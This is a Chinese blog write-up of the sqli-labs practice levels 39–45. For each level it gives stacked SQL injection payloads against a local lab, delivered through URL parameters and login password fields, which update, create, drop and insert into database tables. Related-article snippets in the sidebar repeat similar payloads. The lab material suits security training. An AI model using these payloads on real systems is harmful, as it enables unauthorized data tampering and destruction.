LESS-39-40-41-42-43-44-45

最新推荐文章于 2022-05-08 12:35:42 发布
最新推荐文章于 2022-05-08 12:35:42 发布
阅读量372 收藏
点赞数
分类专栏: sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44598397/article/details/89220687
版权

less-39在这里插入图片描述
第39与38题的区别为本题id没有单引号。
输入:http://127.0.0.1/sqlilabs/Less-39/?id=1; update users set username=‘more’ where id=‘38’ --+(无单引号为错误)在这里插入图片描述在这里插入图片描述
LESS-40
在这里插入图片描述
本处的区别在于id为‘)闭合方式;
输入:http://127.0.0.1/sqlilabs/Less-40/?id=1’);create table food like users --+在这里插入图片描述在这里插入图片描述
LESS-41
此处与 less-39 是一致的,区别在于 41 错误不回显。所以我们称之为盲注在这里插入图片描述
输入:http://127.0.0.1/sqlilabs/Less-41/?id=1; drop table food --+在这里插入图片描述在这里插入图片描述
LESS-42
Update 更新数据后,经过 mysql_real_escape_string()处理后的数据,存入到数据库当中后不会发生变化。在 select 调用的时候才能发挥作用。所以不用考虑在更新密码处进行注入,这关和二次注入的思路是不一样的。
本关从 login.php 源代码中分析可知:在这里插入图片描述在这里插入图片描述在这里插入图片描述Password 变量在 post 过程中,没有通过 mysql_real_escape_string()函数的处理
的时候密码选项我们可以进行 attack。
登录用户名随意
密码登录用以下的方式:bb’;create table less42 like users

输入:login_user=admin&login_password=bb’;create table less42 like users#在这里插入图片描述在这里插入图片描述
Less-43在这里插入图片描述
本关遇上一题的区别为:闭合方式改变
输入:password=bbb’);update food set price=100 where id=1#在这里插入图片描述在这里插入图片描述
LESS-44在这里插入图片描述
无错误提示;
输入:password=BBB’;insert into food(id,price,username) values (3,30,‘qq’)#在这里插入图片描述在这里插入图片描述LESS-45
和上面相同,不过闭合方式发生改变在这里插入图片描述
输入:password=bbb’);insert into food(id,price,username) values (2,60,‘book’)#在这里插入图片描述在这里插入图片描述

林夕林@
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Zoomla!逐浪CMS2 x3.9.6.zip
07-16
42、扩展:互动模型-支持订制报表字段、自定义自段排序,从而使互动报表更加方便,轻松做报表给老板看! 43、优化:订单结算-微信支付页面效果 44、扩展:增加订单管理员提示功能 45、增加:重写了短信SMS模块框架,...
sqli-labs/Less-44
m0_71299382的博客
11-22 188
sqli-labs第四十四关
sqli-Labs————less-40
Fly_鹏程万里
05-20 1047
Less-40查看源代码:<?php error_reporting(0); include("../sql-connections/db-creds.inc"); ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-tr...
sqli-Labs————less-39
Fly_鹏程万里
05-20 402
Less-39查看源代码:<?php error_reporting(0); include("../sql-connections/db-creds.inc"); ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-tr...
sqli-Labs————less-42
Fly_鹏程万里
05-21 1130
Less-42源代码分析:在login.php文件中,我们可以发现以下内容:从上面所指的代码部分我们可以发现,对用户输入的密码没有经过任何的处理操作,因此在登录的时候可以用于注入。payload:username:admin(随意)password:aaa';creat table me like users#(创建表hps)登录之前的四张表:登录之后:这算是一个堆叠注入的一个应用吧!...
SQLi-LABS Less-39到Less-42
m0_64898960的博客
05-08 206
iso-iec 14496-10(3rd_2006-03-01)_MPEG4_AVC_H264.pdf
10-24
Contents Page 0 Introduction.................................................................................................................................................................
EurekaLog_7.5.0.0_Enterprise
11-15
This option will switch from fast-methods to slower methods, but which take less memory. Use 0 (default) for small projects, use 1 for large projects (if ecc32 runs out of memory). 2)....Added: --el_...
雷达技术知识
05-06
18. Differences Between LiDAR and Field Based Slopes (5, 10,20 meters) 44 19. Relationship of Water Surfaces to LiDAR Point Density 47 20. Marmot Dam: Orthophotographyand Colorized Slope Model 50 21. ...
Java 数据库主键生成类 IdWorker
05-05
"worker Id can't be greater than %d or less than 0", this.maxWorkerId)); } this.workerId = workerId; } public synchronized long nextId() { long timestamp = this.timeGen(); if (this.lastTimestamp == ...
Sqli-labs 堆叠注入篇 (Less38~53)
angry_program的博客
02-15 1246
前言 本blog作为练习笔记, 文笔不才, 仅供参考, 不正之处望大神指正。 堆叠注入篇对应labs的38~53关: Less-38 字符型堆叠注入 虽然用很常规的方法都可以注入成功,但是并不侧重于注入爆数据; 而是考察堆叠注入: http://localhost:2333/Less-38/index.php ?id=0' union select 1...
SQL注入详解 38-45
君莫hacker的博客
10-15 401
目录Less-38(堆叠注入)Less-39(堆叠注入)Less-40(堆叠注入)Less-41(堆叠注入)Less-42(登录点堆叠注入)Less-43Less-44Less-45 Less-38(堆叠注入) 第38关总结: 从第38关开始就是堆叠注入,通过构造语句,可以对数据库进行更大的利用,若权限足够高,我们可以进行对数据库的增删改查,读取写入文件,修改各用户权限,进行更多的利用 判断注入类型 单引号字符型注入 判断注入字段数及显示位置 查看数据库名 爆表 爆列 爆数据 在38关,以上的注入步
sqli-labs攻关5(Sta)(Less-39~Less-53)
qwzf
11-17 515
前言 闲来无事,继续打sqlilabs,并总结相关知识。 一、堆叠注入(Less-39~Less-45) Stacked injection:堆叠注入(堆查询注入) 堆叠注入的原理 在SQL中,分号;是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。 而union injection(联合注入)也是将两条语句...
SQLi LABS Less-39
热门推荐
wangyuxiang946的博客
06-22 1万+
第三十九关请求方式为GET请求 , 注入类型为 整形注入 第一步,判断注入类型 ?id=2 and false -- a SQL不成立时 , 不报错,并且无显示 , 说明拼接后的SQL可以正常执行 , 固 注入类型为 整形注入 源码如下 mysqli_multi_query() 可同时执行多条SQL语句 , 满足叠加注入的条件 第二步,判断字段数 使用 order by 测试字段数 ?id=2 order by 4 -- a 从第1列开始排序 , 依次加1 ...
sqli-labs Less-38、39404142434445(sqli-labs闯关指南 38、39404142434445)—堆叠注入
m0_54899775的博客
12-27 1031
sqli-labs Less-38、39404142434445(sqli-labs闯关指南 38、39404142434445)—堆叠注入
【Linux】一步一步学Linux——less命令(40)
C/C++软件工程师、嵌入式软件工程师、物联网研发工程师、C/C++讲师、物联网讲师、嵌入式讲师---欢迎大家一起交流(私信添加博主微信)
07-14 1759
00. 目录 文章目录00. 目录01. 命令概述02. 命令格式03. 常用选项04. 参考示例05. 附录 01. 命令概述 less 与more命令类似,但可以通过翻页键查看上下页的内容 less命令的作用与more十分相似,都可以用来浏览文字档案的内容,不同的是less命令允许用户向前或向后浏览文件,而more命令只能向前浏览。用less命令显示文件时,用PageUp键向上翻页,用Page...
SQLI-LAB  的 实战记录(Less 41 - Less 53)
这块盾牌有待改良
07-20 2693
Less - 41 stacked Query Intiger type blind Less - 42 Stacked Query error based Less - 43 stacked Query String type
sqli-labs (less-44)
kukudeshuo的博客
03-15 292
sqli-labs (less-44) 进入44关,发现依然是这个页面 输入admin' 这里发现没有错误回显了,所以我们只能去猜了 admin--+ # admin'--+ 所以判断闭合方式为’#,并且为字符型注入 这里我们直接使用堆叠注入 创建一张表 a';create table test like users;# 创建一个新的用户 a';insert into users values(18,'icepeak','icepeak');# ...
Sqli-labs less 44
weixin_34125592的博客
08-11 100
Less-44 本关是基于盲注的,这里盲注主要是要没有报错信息,所以要采用盲注。这关与42关的区别就在于没有报错信息,同时,我们使用同样方式的payload: 登录 username:admin Password:a';insert into users(id,username,password) values ('144','less44','hello')# 可以看到添...
linux50个常用命令
最新发布
03-16
以下是 Linux 50 个常用命令: 1. ls - 列出目录内容 2. cd - 更改当前目录 3. pwd - 显示当前工作目录 4. mkdir - 创建目录 5. rmdir - 删除空目录 6. touch - 创建文件 7. cp - 复制文件或目录 8. mv - 移动或重命名文件 9. rm - 删除文件 10. cat - 显示文件内容 11. more - 逐页显示文件内容 12. less - 更适合大文件的文件阅读器 13. head - 显示文件前几行 14. tail - 显示文件末尾几行 15. nano - 简单的文本编辑器 16. vi / vim - 功能强大的文本编辑器 17. chmod - 更改文件权限 18. chown - 更改文件所有者 19. tar - 压缩或解压文件 20. gzip - 压缩文件 21. gunzip - 解压文件 22. zip - 压缩文件 23. unzip - 解压文件 24. find - 查找文件 25. locate - 查找文件 26. which - 查找命令的位置 27. whereis - 查找命令的位置和文件 28. ps - 显示当前进程 29. top - 显示实时系统信息 30. free - 显示内存使用情况 31. df - 显示磁盘使用情况 32. du - 显示目录或文件的磁盘使用情况 33. ping - 测试网络连通性 34. traceroute - 显示数据包从源到目的地的路径 35. ssh - 远程登录 36. scp - 远程复制文件 37. curl - 从网络传输数据 38. wget - 从网络下载文件 39. ftp - 文件传输协议 40. tar - 压缩或解压文件 41. grep - 搜索文件内容 42. sed - 文本替换工具 43. awk - 文本处理语言 44. diff - 比较两个文件的差异 45. sort - 排序文件内容 46. uniq - 去除重复行 47. cut - 剪切文件内容 48. paste - 合并多个文件 49. join - 合并两个文件 50. tty - 显示当前终端名称。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值